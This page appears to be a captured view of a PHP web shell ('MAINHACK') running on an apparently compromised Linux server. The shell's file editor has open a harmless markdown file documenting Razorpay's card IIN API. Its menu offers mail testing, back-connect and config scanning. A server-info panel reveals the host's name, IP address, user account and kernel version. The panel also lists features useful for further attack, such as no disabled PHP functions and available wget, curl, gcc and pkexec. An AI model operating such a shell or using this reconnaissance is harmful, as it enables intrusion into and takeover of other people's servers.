[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: Iin.md
### Iin ### Token IIN API ```php $tokenIin = "412345"; $api->iin->fetch($tokenIin); ``` **Parameters:** | Name | Type | Description | |------------|--------|-----------------------------------| | tokenIin* | string | The token IIN. | **Response:** ```json { "iin": "412345", "entity": "iin", "network": "Visa", "type": "credit", "sub_type": "business", "issuer_code": "HDFC", "issuer_name": "HDFC Bank Ltd", "international": false, "is_tokenized": true, "card_iin": "411111", "emi":{ "available": true }, "recurring": { "available": true }, "authentication_types": [ { "type":"3ds" }, { "type":"otp" } ] } ``` ------------------------------------------------------------------------------------------------------- ### Fetch All IINs Supporting Native OTP ```php $api->iin->all(array("flow" => "otp")); ``` **Response:** ```json { "count": 24, "iins": [ "512967", "180005", "401704", "401806", "123456", "411111", "123512967", "180012305", "401123704" ] } ``` ------------------------------------------------------------------------------------------------------- ### Fetch All IINs with Business Sub-type ```php $api->iin->all(array("sub_type" => "business")); ``` **Response:** ```json { "count": 24, "iins": [ "512967", "180005", "401704", "401806", "607389", "652203", "414367", "787878", "123456", "411111", "123512967", "180012305", "401123704" ] } ``` ------------------------------------------------------------------------------------------------------- **PN: * indicates mandatory fields** <br> <br> **For reference click [here](https://razorpay.com/docs/api/payments/cards/iin-api/#iin-entity)**
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.82 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002